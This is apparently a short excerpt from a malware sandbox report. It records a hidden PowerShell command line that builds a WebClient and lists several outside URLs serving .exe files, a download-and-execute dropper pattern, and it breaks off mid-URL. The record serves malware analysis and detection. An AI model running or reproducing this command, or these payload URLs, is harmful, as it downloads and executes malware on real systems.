Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden $webclient = new-object System.Net.WebClient;$myurls = 'http://createpowerfulchange.com/srbedgp.exe,http://fabrictestingsolutions.co.za/rlcynwt.exe,http://lomicon.es/ftxxkfa...' (with hidden window)